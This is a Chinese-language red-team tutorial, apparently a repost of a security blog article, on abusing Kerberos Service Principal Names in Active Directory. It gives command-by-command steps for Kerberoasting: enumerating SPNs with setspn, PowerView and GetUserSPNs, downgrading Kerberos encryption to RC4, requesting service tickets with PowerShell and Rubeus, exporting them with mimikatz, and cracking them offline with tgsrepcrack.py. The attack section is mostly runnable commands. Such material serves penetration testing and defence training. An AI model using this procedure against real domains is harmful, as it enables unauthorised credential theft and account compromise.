SPN的相关利用
2022-9-28 17:29:40 Author: mp.weixin.qq.com(查看原文) 阅读量:9 收藏

首发先知社区:https://xz.aliyun.com/t/10106

服务主体名称(SPN)是服务实例,可以理解为一个服务,比如mssql,http等等的唯一标识符。如果在整个林或域中的计算机上安装多个服务实例,则每个实例都必须具有自己的 SPN,Kerberos 身份验证使用 SPN 将服务实例与服务登录帐户相关联。

2.1 机器账户

只有机器账户或者域管账户才有权限注册SPN。

setspn -S mssqlserver/hostname.xx.com:1433 accountname

2.2 域用户

setspn -S SqlServer/mssql.redteam.local:1434/SqlServer hack

2.3 查看已注册的SPN

查看域内所有SPN

setspn -q */*

指定查看域注册的SPN

setspn -T redteam.local -q */*

删除指定SPN

setspn -D mssql/mssql.redteam.local:1433/mssql mssql

指定用户名/主机名查看SPN

setspn -L username/hostname

在域内渗透我们就不需要通过扫描来查看到底那台机器开了那些服务,可以通过SPN来获取想要的信息。相对于隐蔽性强。

3.1 PowerView

powershell -exec bypass
Import-module .\powerview.ps1
Get-NetUser -SPN

3.2 PowerShell-AD-Recon

Import-Module .\Discover-PSInterestingServices.ps1
Discover-PSInterestingServices      #扫描域内的所有SPN信息

3.3 GetUserSPNs

Import-Module .\GetUserSPNs.ps1

3.4 流量分析

通过wireshark可以看到

就是通过LDAP协议向域控服务器上的LADP查询了SPN服务。

可以通过ADSI编辑器查看用户属性的servicePrincipalName值

kerberos通信过程:

在TGS-REQ中会发出ST服务票据获取servicePrincipalName(SPN),该SPN是用户或者机器用户注册的。TGS-REP中TGS会返回给user一个ST,而ST是由user请求的server的密码进行加密的,我们可以从TGS-REP中提取加密的服务票证来进行离线解密。

在本地安全策略中将kerberos允许的加密类型改为RC4加密:

在运行更新策略:

gpupdate

4.1 SPN扫描

Import-Module .\GetUserSPNs.ps1

4.2 请求票据

4.2.1 powershell请求

Add-Type -AssemblyName System.IdentityModel  New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SqlServer/mssql.redteam.local:1434/SqlServer"

4.2.2 Rubeus.exe

Rubeus.exe kerberoast

Rubeus原理为现在LDAP查询SPN,再发送TGS包,再打印出hash,可以使用hashcat等进行爆破。

4.3 导出票据

mimikatz导出票据

kerberos::list /export

4.4 离线破解

使用tgsrepcrack.py

python2 tgsrepcrack.py pass.txt xx.kirbi
原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:[email protected]

文章类型:黑客极客技术、信息安全热点安全研究分析安全相关

通过审核并发布能收获200-800元不等的稿酬。

更多详情,点我查看!

限时免费靶场实操,戳“阅读原文“

文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652891314&idx=1&sn=afdac5b47c4cf98d1560f310d91e7df9&chksm=bd59947f8a2e1d699b7dd6cef8c20eb46c5d2843ec3ebd8d62770e67052449152e2b17e0adf2#rd
如有侵权请联系:admin#unsafe.sh